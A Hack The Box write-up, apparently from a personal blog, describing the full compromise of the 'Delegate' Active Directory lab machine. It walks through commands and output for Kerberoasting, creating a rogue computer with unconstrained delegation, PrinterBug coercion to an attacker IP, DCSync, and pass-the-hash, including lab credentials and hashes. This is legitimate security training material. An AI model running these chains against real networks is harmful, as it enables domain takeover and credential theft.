delegate - hack the box

Attacker IP: 10.10.14.118 Target IP: 10.129.125.244

Network Enumeration

nmap -sCVS 10.129.125.244

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-14 12:48:07Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-09-14T12:48:49+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Not valid before: 2025-09-13T12:32:58
|_Not valid after:  2026-03-15T12:32:58
| rdp-ntlm-info: 
|   Target_Name: DELEGATE
|   NetBIOS_Domain_Name: DELEGATE
|   NetBIOS_Computer_Name: DC1
|   DNS_Domain_Name: delegate.vl
|   DNS_Computer_Name: DC1.delegate.vl
|   DNS_Tree_Name: delegate.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-09-14T12:48:09+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-09-14T12:48:14
|_  start_date: N/A

nxc smb delegate.vl -u 'guest' -p '' --shares

Guest access is enabled for some SMB shares

alt text

NETLOGON share has a file named users.bat. We download this file to our attacking machine.

users.bat

alt text

users.bat contains a username A.Briggs as well as Administrator and password P4ssw0rd1#123

alt text

The password found in the file works with the A.Briggs account, this was tested by authenticating with SMB

nxc smb delegate.vl -u 'A.Briggs' -p 'P4ssw0rd1#123' --shares

alt text

The account does not have any other share permissions when compared to the guest account. Since this is an Active Directory environment we can run Bloodhound to see if there are any configurations we can exploit.

Bloodhound

We use bloodhound-python to gather the data that will be ingested by Bloodhound. This is done by connecting to various services (SMB, LDAP, RPC) with an authenticated account to enumerate the Active Directory environment.

bloodhound-python -c all -u 'A.Briggs' -p 'P4ssw0rd1#123' -ns 10.129.125.244 -d 'delegate.vl'

alt text We look at the outbound control that A.Briggs has. The account has GenericWrite permissions over N.Thompson. With this, we can attempt Targeted Kerberoasting.

Targeted Kerberoasting An attacker with Generic Write can set a Service Principal Name (SPN) on a target user account, then perform Kerberoasting to crack the account’s password offline. This is particularly effective against accounts with weak passwords.

python targetedKerberoast.py -v -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123'

alt text

We get a hash for N.Thompson that we can try to crack using Hashcat

hashcat hash ~/Desktop/tools/rockyou.txt

hashcat will automatically recognize the hash as mode 13100 (Kerberos 5, etype 23, TGS-REP)

We get the password to N.Thompson

N.Thompson:KALEB_2341

alt text

We are able to connect to the target via winrm with these credentials

N.Thompson

evil-winrm -i delegate.vl -u 'N.Thompson' -p 'KALEB_2341'

whoami /priv

alt text

We check the privileges that N.Thompson has. SeEnableDelegationPrivilege

https://www.thehacker.recipes/ad/movement/kerberos/delegations/

SeEnableDelegationPrivilege

SeEnableDelegationPrivilege is a powerful Windows user right that allows an account to enable computer and user accounts to be trusted for delegation. This privilege is typically assigned to domain administrators and can be significantly abused if compromised.

What SeEnableDelegationPrivilege Allows

Delegation Configuration An account with SeEnableDelegationPrivilege can modify the delegation settings on computer and user accounts, specifically:

  • Enable unconstrained delegation
  • Configure constrained delegation
  • Set up resource-based constrained delegation (RBCD)
  • Modify the msDS-AllowedToDelegateTo attribute
  • Set the TRUSTED_FOR_DELEGATION flag

The attack we will be preforming is RBCD.

Resource-Based Constrained Delegation (RBCD) This is often the most practical abuse method. The attacker can:

  • Create or compromise a computer account
  • Configure RBCD to allow this computer to delegate to high-value targets
  • Use the S4U2Self and S4U2Proxy protocols to impersonate privileged users
  • Access sensitive resources as domain administrators

Limited Computer Creation Rights By default, domain users can create up to 10 computer accounts in Active Directory (controlled by the ms-DS-MachineAccountQuota attribute). However, this quota may have been modified by administrators.

Why Check MachineAccountQuota?

Before attempting to create a new computer account, the attacker needs to know:

  • What the current quota limit is
  • How many computer accounts have already been created by domain users
  • Whether they can create additional computer accounts

We can use nxc to narrow this information down.

nxc ldap delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -M maq

alt text

We can also accomplish this using ldapsearch with this query

ldapsearch -x -H ldap://dc1.delegate.vl -D "[email protected]" -W -b "DC=delegate,DC=vl" "(objectClass=domain)" ms-DS-MachineAccountQuota

alt text

Use impacket-addcomputer to add our malicious computer to the AD environment

impacket-addcomputer -computer-name 'EvilPC' -computer-pass 'Password123!' 'dc1.delegate.vl/N.Thompson:KALEB_2341' -dc-ip 10.129.125.244

alt text

Next we enable unconstrained delegation on our malicious computer.

# Set the TRUSTED_FOR_DELEGATION flag (0x80000)
$computer = Get-ADComputer -Identity "YOURCOMPUTER"
Set-ADAccountControl -Identity $computer -TrustedForDelegation $true

# Verify it's enabled
Get-ADComputer -Identity "YOURCOMPUTER" -Properties TrustedForDelegation | 
    Select-Object Name, TrustedForDelegation

alt text

DNS & SPN addition

https://github.com/dirkjanm/krbrelayx

python dnstool.py -u 'delegate.vl\EvilPC$' -p 'Password123!' -r EvilPC.delegate.vl -d 10.10.14.118 --action add -dns-ip 10.129.125.244 dc1.delegate.vl

We add a DNS record so that our malicious computer is able to be discovered and linked to our attacking machine.

alt text

We are also going to add SPNs. These are important because without these, no TGT will be captured.

Without SPNs:

User tries to connect → No SPN found → Connection fails or uses NTLM → No TGT captured

With SPNs:

User connects → Kerberos finds SPN → Requests service ticket → Sends TGT due to unconstrained delegation → You capture TGT

python addspn.py DC1.delegate.vl -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/EvilPC.delegate.vl' -t 'EvilPC$' -dc-ip 10.129.125.244 --additional

alt text

We can verify that this was successfully added with this command

Get-ADComputer -Identity "EVILPC" -Properties ServicePrincipalNames | Select-Object -ExpandProperty ServicePrincipalNames

alt text

Once this is complete we can use printerbug to capture TGT

PrinterBug

What PrinterBug Does

PrinterBug exploits the MS-RPRN (Print System Remote Protocol) to force a target machine to authenticate to an attacker-controlled server. It’s one of the most reliable authentication coercion techniques in Windows environments.

How PrinterBug Works

  1. Initial RPC Call:
Attacker -> Target: "Hey, monitor printer changes and send notifications to 10.10.14.118"
  1. Target Response:
Target -> Attacker's IP: Attempts SMB connection with machine authentication
  1. Kerberos Authentication:
Target requests service ticket for CIFS/EvilPC.delegate.vl
If unconstrained delegation is enabled, TGT is included and cached

First we are going to have to convert the password of our EvilPC to an NTLM hash so we can decrypt the Kerberos ticket.

Here is a python script to help do this.

import hashlib
password = "ENTER YOUR PASSWORD HERE"
ntlm_hash = hashlib.new('md4', password.encode('utf-16le')).hexdigest()
print(f"NTLM Hash: {ntlm_hash}")

Set up your listener

python3 krbrelayx.py -hashes :2b576acbe6bcfda7294d6bd18041b8fe

We execute printerbug afterwards and look for the response

python printerbug.py -hashes :2b576acbe6bcfda7294d6bd18041b8fe delegate.vl/EvilPC\[email protected] EvilPC.delegate.vl

alt text alt text

Finally we can preform a DCSync attack with this ticket to obtain the Administrator hash.

  1. Uses your captured TGT to authenticate to the domain controller
  2. Performs DCSync replication to extract the Administrator’s password hash
  3. Returns the NTLM hash for the Administrator account

impacket-secretsdump -k dc1.delegate.vl -just-dc-user Administrator

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::

alt text

evil-winrm -i 10.129.125.244 -u 'administrator' -H 'c32198ceab4cc695e65045562aa3ee93'

We are able to connect with our hash and get our flag. pwned

 

pwnand.win

2025-09-14

On this page: